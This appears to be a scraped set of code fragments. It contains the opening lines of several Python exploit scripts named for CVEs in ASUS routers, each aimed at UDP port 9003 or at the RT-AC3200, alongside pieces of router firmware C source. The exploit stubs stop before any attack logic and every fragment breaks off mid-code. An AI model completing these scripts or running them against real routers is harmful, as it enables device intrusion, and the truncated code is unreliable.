smirani2

#!/usr/bin/env python3

# CVE-2019-17364.py

import socket
import sys

addr = (sys.argv[1], 9003)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

smirani2

#!/usr/bin/env python3

# CVE-2019-16735.py

import socket
import sys

addr = (sys.argv[1], 9003)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

smirani2

#!/usr/bin/env python3

# CVE-2019-16736.py

import socket
import sys

addr = (sys.argv[1], 9003)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
 

smirani2

#!/usr/bin/env python3

# CVE-2019-16730.py

import socket
import sys

addr = (sys.argv[1], 9003)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

smirani2

#!/usr/bin/env python3

# CVE-2019-16733.py

import socket
import sys

addr = (sys.argv[1], 9003)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

smirani2

#!/usr/bin/env python3

# CVE-2019-16737.py

import socket
import sys

addr = (sys.argv[1], 9003)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

smirani2

#!/usr/bin/env python

# Usage:
# ./rt-ac3200_CVE-2018-14712.py <target host> <target port> <admin username> <admin password>

import base64
import requests
import struct
import sys

smirani2

extern int read_mount_data(const char *device_name
		, char *mount_point, int mount_len
		, char *type, int type_len
		, char *right, int right_len
		){
	char *mount_info = read_whole_file(MOUNT_FILE);
	char *start, line[PATH_MAX];
	char target[8];

	if(mount_point == NULL || mount_len <= 0

smirani2

extern int get_mount_path(const char *const pool, char *mount_path, int mount_len){
	char type[64], right[PATH_MAX];

	return read_mount_data(pool, mount_path, mount_len, type, 64, right, PATH_MAX);
}

smirani2

/*
 * Example:
 * wan_proto=dhcp
 * <% nvram_match("wan_proto", "dhcp", "selected"); %> produces "selected"
 * <% nvram_match("wan_proto", "static", "selected"); %> does not produce
 */
static int
ej_nvram_match(int eid, webs_t wp, int argc, char_t **argv)
{
	char *name, *match, *output;